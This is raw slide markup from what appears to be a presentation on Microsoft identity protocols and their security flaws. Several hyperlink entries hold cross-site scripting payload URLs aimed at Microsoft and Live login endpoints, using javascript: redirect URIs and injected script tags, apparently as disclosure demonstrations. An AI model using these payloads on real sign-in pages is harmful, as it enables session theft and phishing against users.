        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="496073" y="337334"/>
          <a:ext cx="4476523" cy="67502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u="none" kern="1200" dirty="0"/>
            <a:t>SAML 1.1</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="496073" y="337334"/>
        <a:ext cx="4476523" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B69DCF54-2D9D-4535-9929-670416E84C0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74185" y="252957"/>
          <a:ext cx="843775" cy="8437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952D4BF-A371-43F1-BD47-FA648C912FD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883078" y="1350041"/>
          <a:ext cx="4089519" cy="67502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u="none" kern="1200" dirty="0"/>
            <a:t>SAML 2.0</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883078" y="1350041"/>
        <a:ext cx="4089519" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A8FED190-5BAE-42D3-AB70-CCD3653FDC0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="461190" y="1265663"/>
          <a:ext cx="843775" cy="8437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57F507D-12BB-42FA-A84E-AE57235F61F1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883078" y="2362747"/>
          <a:ext cx="4089519" cy="67502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JWT</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883078" y="2362747"/>
        <a:ext cx="4089519" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1C1BBB6-DD01-43EF-8B51-3677343800A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="461190" y="2278369"/>
          <a:ext cx="843775" cy="8437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0097499-02B0-4D57-BAD1-CC21EF7072FC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="496073" y="3375453"/>
          <a:ext cx="4476523" cy="67502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579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…</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="496073" y="3375453"/>
        <a:ext cx="4476523" cy="675020"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{792F66F8-49DF-49C4-A2C8-AC432EDDED38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="74185" y="3291076"/>
          <a:ext cx="843775" cy="8437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B447B-2EFD-46DE-A2BE-33B4F7133E4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B6931-C50A-4FCC-9B85-A19B353F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2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1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9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5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5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2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35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7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0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08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00C2-FEC0-4BCD-83DB-1BD5ADF8A2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0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9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17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8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5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4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5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5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2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0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6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21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23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2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7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2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6931-C50A-4FCC-9B85-A19B353F6F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B1B2-F80E-4208-99CF-E13CAE6A6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0DB7-1CC1-4B85-923C-EEE2E8AD2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4027-73AA-45E3-9EFA-7B274518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96DB-0082-491B-BE74-35DCBC0F38F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FBE2-861A-458E-87F5-98AC2858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D25F-C965-413E-9086-BBAB004D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2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DF3E-51FD-4000-8230-410AE8A8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9412F-9B33-4D03-8B79-D147B5FF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4C82-E6DA-417C-A7E5-4490E361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8455-A4DA-4749-AB20-C3D6E79CA8E8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5E23-8525-4753-B30A-32B761F7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FCF2-59AA-4C4E-A960-DDBC9295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64D0F-D155-4B39-A442-1F6C0F44B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264B5-0F34-4019-B7A3-42423E063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2A82-2B9C-4357-8FCB-23B865DF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C06E-583B-405E-A062-522F8AD00056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8518-E456-4A64-A6F4-045E20F5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0F2A-C655-43D6-A9E4-FF3E2D69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2655-B052-400F-8616-791C788F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A669-EFB5-4533-A62C-5CD6E77E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FB0B-C817-4AC5-910F-09B80B23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6BA-2775-48DD-B4B9-0F5A49C5203F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BE98-AD05-4608-9F25-F98FE228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8A87-287B-4BAC-AB3A-CF129461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5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EEB7-A76A-475F-BE11-A50C9230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F1AB-AD67-4E70-A341-18BA81378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9EAD-B310-4F29-B531-AFF53EEA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917D-9DD7-4BEE-9A16-32F7B1B91D6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47187-F819-48B9-975E-6A9E4D0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58EB-D575-4F3B-8313-9EBE0327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5C02-3A56-4EDE-9B6F-6FF4EAD6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F453-B950-4CC5-AA27-62FC40B0B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EC3AF-449D-4D79-8D53-4F8DDE497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3DCB6-D8C7-475C-8817-2D2815FB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260-61B3-4748-A88A-D91341412A30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7E95E-21A9-40CA-8283-34462D0D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FA96-9501-43B7-BBAF-C12B71EB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D378-797B-4812-B9AB-BDCA1DA4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7D376-3D9D-4621-949A-7E30E3B2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D0F13-D943-4B25-90E0-F119B428F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38E9F-223A-474B-BC45-E095E8245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264D-8CEB-4B92-B79E-115AFE356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0531D-4733-4BC3-AEB0-30E1B2F5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9E83-A484-41AA-A59E-838B7C4FA4F2}" type="datetime1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2B28A-3BB7-473E-AD27-2D08AEC7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EEA58-98D9-431E-980A-FE59055B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3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051D-7F8A-4356-AC10-17F2AE6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4FD74-8AD7-41F3-85AA-CC36E93A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926-C332-4DE9-9CD1-15266B46148A}" type="datetime1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EA3F1-2D7E-4553-BC95-654EF91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1B7F3-330E-429E-B959-B13D565E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01A7A-8221-4CF2-BDFB-57555AEE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928F-D55F-4D45-9ADD-8F8D49452A74}" type="datetime1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69D73-1970-4BDD-B71E-CEE69496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5EBF9-BFC8-4BAE-8B8E-8A2FEED2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6757-EB2E-47BB-B353-7141F761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EB3A-5BF6-42C5-97C9-DEC60F7C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5BFC6-F369-4C72-8685-0BC745374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D7F0-77D1-48FE-83A9-3887C14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FC3B-6A56-4FCC-9F07-DF88EB16547E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6F8E9-C021-438D-BDA2-50D073C0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A873-8B5F-44E2-8350-12D01FC1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4F23-69B1-4892-A301-CC68746C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91B9F-19CD-4F9B-BEF9-2B216EC7A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4AC7D-106E-4E76-8A8F-77A0FC99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B1E83-E88D-48F1-A921-CC09E216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4D43-D08A-45D8-A642-C995B0DC5B7D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297A5-2E5B-460E-83E1-814A3E2C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9EE61-B4CA-412E-874F-241C963D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41B38-0EEF-4E37-89C3-36D5D507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E328-7909-4A38-8EF3-60B3E37D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4D256-AE2C-4F8B-AED0-547BD543D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D06F-0411-47A8-BF41-21DB00BB2E1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4E2F-17FE-4ACD-9B10-82BB8EBC7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E3C2-ABE2-4EEB-AB1C-ECE3C1D0E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9A82-5E64-4EE3-990F-4521E10B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29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slide" Target="slide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image" Target="../media/image3.png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2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3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microsoftonline.com/common/oauth2/authoriz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n.live.com/login.srf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.live.com/oauth20_authorize.srf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.microsoftonline.com/login.sr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49.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.sv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35.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image59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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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50.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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49.sv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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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n.microsoftonline.com/common/oauth2/token/" TargetMode="Externa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s://login.live.com/login.srf?wa=wsignin1.0&amp;wp=MBI_SSL&amp;wreply=https://login.live.com&amp;username=test%3c/script%3e%3cscript%3ealert('hello')%3c/script%3e%3cscript%3e12374271" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.microsoftonline.com/common/oauth2/v2.0/logout?p=b2c_1_ignite2017fullreg_registration_signinup&amp;post_logout_redirect_uri=javascript:confirm(document.domain)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n.microsoftonline.com/common/oauth2/authorize?redirect_uri=javascript://evil.com/?%0Aalert('XSS%20at%20'%2Bdocument.domain)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.microsoftonline.com/login.srf?wa=wsignin1.0&amp;wreply=javascript:%2F%2Fportal.office.com/%250Aalert(document.domain)//" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.live.com/login.srf?%7d&amp;&amp;alert%60hello%60//%7b&amp;username=test@hotmail.com\" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61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hyperlink" Target="https://login.microsoftonline.com/common/oauth2/authorize" TargetMode="External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n.live.com/login.srf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.live.com/oauth20_authorize.srf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://login.microsoftonline.com/login.sr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bts-sta.fr/la-maison-du-futur-toujours-plus-technologisee-deviendra-t-elle-une-maison-toujours-moins-humanisee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intonbates.blogspot.com/2016/05/is-economics-becoming-branch-of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1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ummary Zoom 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DB160C-82AB-4479-BEE3-EA76FEAEE3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582570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33FA2D65-F4AA-4015-ABC6-EF6EF2609058}">
                    <psuz:zmPr id="{29AEAA59-381E-412A-8F76-4A9EA4405B0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C709D4E-F9EC-4765-9396-64203B92DF44}">
                    <psuz:zmPr id="{7DCB3E8F-7BC9-48B7-B0F5-DA8E7B297D5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59CC069-342F-4CD4-88CB-C93447ED251A}">
                    <psuz:zmPr id="{A2BA00D1-E842-47BC-9EC6-54D390FE4331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30B44AC-91A1-4970-ACEC-42205ADAD532}">
                    <psuz:zmPr id="{F747D63A-7BA0-4329-B6EB-D206A07D3509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718B43A-238F-4F90-BB7B-A46ACD82C93C}">
                    <psuz:zmPr id="{5A62D8BC-13FE-4B75-9834-B24C75EB0CF3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43609DB-F941-4F1F-A475-305838A4D177}">
                    <psuz:zmPr id="{7A2FE85D-2661-4AA3-81BD-D9B28A667A68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ummary Zoom 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4DB160C-82AB-4479-BEE3-EA76FEAEE32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2" name="Picture 2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Picture 5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A5442-B6EB-46FE-8BF9-A635AC1A8F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/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 smtClean="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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="15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4178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29884"/>
            <a:ext cx="4099559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Path to Identity: Sign in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845939-1844-424C-8A73-A7C599E51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045990"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="667238" y="1138767"/>
          <a:ext cx="3340099" cy="3204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C1F59768-B3CF-4B00-805C-3575B78A6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486986"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4580514" y="392181"/>
          <a:ext cx="5032898" cy="438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9D31208-424C-4255-A75E-94102CCE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10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240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29884"/>
            <a:ext cx="4153348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Path to Identity: Auth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845939-1844-424C-8A73-A7C599E51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51232"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1234017"/>
          <a:ext cx="3562350" cy="3128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C650926-FFF7-422F-A9BA-AE1563BF1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685294"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4580514" y="392181"/>
          <a:ext cx="5032898" cy="438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A3F7646-6777-4A37-928B-AAD4DA27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11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8492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4433047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Path to Identity: Token Type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845939-1844-424C-8A73-A7C599E51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972919"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="539750" y="1392767"/>
          <a:ext cx="3803650" cy="3020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DB29007-0F57-415E-AAE6-B2F8FC6B1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008098"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4580514" y="392181"/>
          <a:ext cx="5032898" cy="438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BD2B35C-A385-4421-90AF-8A99BE70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12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607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29884"/>
            <a:ext cx="7036398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Path to Identity:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enterprise Vs Consumer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6239-78B7-4E4A-9E45-69EF0ACF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388755"/>
            <a:ext cx="10515600" cy="2478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Enterprise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https://login.microsoftonline.com/common/oauth2/authorize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (OAUTH/OPENID/JWT)</a:t>
            </a:r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https://login.microsoftonline.com/login.srf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (WS-FED/Kerberos/SAML)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Consumer</a:t>
            </a:r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https://login.live.com/oauth20_authorize.srf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (OAUTH/OPENID/JWT)</a:t>
            </a:r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https://login.live.com/login.srf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> (WS-FED/SAML/Base64)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1B99-9411-4390-8DE0-6E0ABE3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13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237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E8734-C214-4DA6-BA83-64151D4F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Protocols and its Nightmares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 descr="Crib">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3512478D-3F9B-42D8-B3D9-744F93EE4534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="706199" y="693810"/>
            <a:ext cx="3594846" cy="397926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35D862D3-C5C3-415D-9E92-DC623074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14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414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70F7D-6D34-45C8-8A27-305EF768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4465319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Authentication flow: The Players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9158BA-FF05-4F4C-A09E-02AF1826A450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8681837" y="1549925"/>
            <a:ext cx="2910231" cy="2376779"/>
            <a:chOff x="8417380" y="231785"/>
            <a:chExt cx="2910231" cy="2376779"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 36" descr="Employee Badge">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C588004-0571-4F5C-924D-413041EA0A9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9211979" y="231785"/>
              <a:ext cx="1300252" cy="1300252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50C242E-BA1A-4D28-AF67-E776CE18277A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8417380" y="1451678"/>
              <a:ext cx="2910231" cy="1156886"/>
              <a:chOff x="7208178" y="2071990"/>
              <a:chExt cx="2910231" cy="115688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8A23B63-2FBD-4A4D-B59D-C1B06CB7F4DA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7208178" y="2508876"/>
                <a:ext cx="288945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60D276-7E12-4136-A5FE-91C69887ED2D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7228959" y="2071990"/>
                <a:ext cx="288945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/>
                  <a:t>Identity Provider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111067-19AD-444C-962F-5AAD06C64DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="276710" y="1489508"/>
            <a:ext cx="3064886" cy="2401690"/>
            <a:chOff x="1398000" y="1861825"/>
            <a:chExt cx="4351760" cy="3134349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="Rectangle 53" descr="Target Audience">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609DE235-67FE-4A50-BE04-117F6F315198}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2586000" y="1861825"/>
              <a:ext cx="1944000" cy="194400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F6239B-7151-4E0C-8C0E-81D44FF7C549}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398000" y="3532706"/>
              <a:ext cx="4351760" cy="1463468"/>
              <a:chOff x="559800" y="2144193"/>
              <a:chExt cx="4351760" cy="146346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A194C3-6A55-4C68-A772-8FC1DE67BAE4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="559800" y="2887661"/>
                <a:ext cx="432000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5248046-394D-412A-8FF8-F970273D93F2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="591561" y="2144193"/>
                <a:ext cx="4319999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20447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/>
                  <a:t>User</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="4600" kern="1200" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grp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6A35DF6-A5D3-497E-A5A2-782CC6A4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15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932DC2-93F7-487F-A371-68BF68719F43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7250950" y="2162287"/>
            <a:ext cx="161335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4C7CD0-EF3E-416E-B593-4C13C93238FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7733273" y="1792955"/>
            <a:ext cx="64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69B98-6275-4FAF-B0CC-D01BD3F47118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9622290" y="3249119"/>
            <a:ext cx="230879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App Manifest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App ID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Expected Permissions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App URL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EA2F63-0AEC-4F0D-ABD3-9A9AB8CD6453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2482535" y="1422220"/>
            <a:ext cx="5035335" cy="2210183"/>
            <a:chOff x="2482535" y="1422220"/>
            <a:chExt cx="5035335" cy="221018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246282-59E8-4615-BEF7-EDF9D7735383}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4441101" y="1422220"/>
              <a:ext cx="3076769" cy="2210183"/>
              <a:chOff x="7716735" y="1592258"/>
              <a:chExt cx="3076769" cy="221018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A31DD7F-417E-4A9A-BF23-EB5BCA3F9312}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7716735" y="2925992"/>
                <a:ext cx="3076769" cy="876449"/>
                <a:chOff x="5514488" y="2405875"/>
                <a:chExt cx="4441312" cy="1201786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B6932B3-9D8E-4334-8CD6-3F55CED51675}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5635800" y="2887661"/>
                  <a:ext cx="4320000" cy="720000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A69263B-F84F-4244-9A61-7896E5A4E405}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5514488" y="2405875"/>
                  <a:ext cx="4320000" cy="72000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20447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800" kern="1200" dirty="0"/>
                    <a:t>App -&gt; Resource Provider</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="Graphic 34" descr="Internet">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A769F7D-54CA-4F09-9FDF-B56856B08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339171" y="1592258"/>
                <a:ext cx="1643716" cy="1643716"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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C171FC-106B-4DF8-A8C6-6ED2895DF855}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="54" idx="3"/>
              <a:endCxn id="35" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2482535" y="2234302"/>
              <a:ext cx="2581002" cy="9776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 descr="Employee Badge">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F26283F-E317-4AE4-A4BE-182737B000D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6504485" y="1453710"/>
            <a:ext cx="495305" cy="47595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1B53F-93BD-41E3-ACF7-059777787DC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2482535" y="282697"/>
            <a:ext cx="4340216" cy="4842936"/>
            <a:chOff x="2482535" y="282697"/>
            <a:chExt cx="4340216" cy="484293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69F916A-D774-4E44-A44D-2936DB259B4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5075715" y="297779"/>
              <a:ext cx="1723499" cy="956653"/>
              <a:chOff x="7716735" y="1592257"/>
              <a:chExt cx="3076769" cy="221018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C3702A8-1125-4867-B849-0FEFF98360F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7716735" y="2925992"/>
                <a:ext cx="3076769" cy="876449"/>
                <a:chOff x="5514488" y="2405875"/>
                <a:chExt cx="4441312" cy="1201786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8A808CD-ADA7-46FA-81B2-B0B25AF99B0A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5635800" y="2887661"/>
                  <a:ext cx="4320000" cy="720000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1F0A855-203D-4657-A3CB-B489AD933B63}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="5514488" y="2405875"/>
                  <a:ext cx="4320000" cy="72000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20447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App -&gt; Resource Provider</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Graphic 27" descr="Internet">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B3D0FB-2ED3-419D-8639-495F0F2A6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339171" y="1592257"/>
                <a:ext cx="1643717" cy="164371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9262EFD-F8B9-43FC-8655-A7024F02AB34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5099252" y="4168980"/>
              <a:ext cx="1723499" cy="956653"/>
              <a:chOff x="7716735" y="1592257"/>
              <a:chExt cx="3076769" cy="221018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525C8BF-48F1-4EE1-B2FB-12CA0BF544A6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7716735" y="2925992"/>
                <a:ext cx="3076769" cy="876449"/>
                <a:chOff x="5514488" y="2405875"/>
                <a:chExt cx="4441312" cy="1201786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3F491D7-3BD3-4FF2-8640-850F63CA3660}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
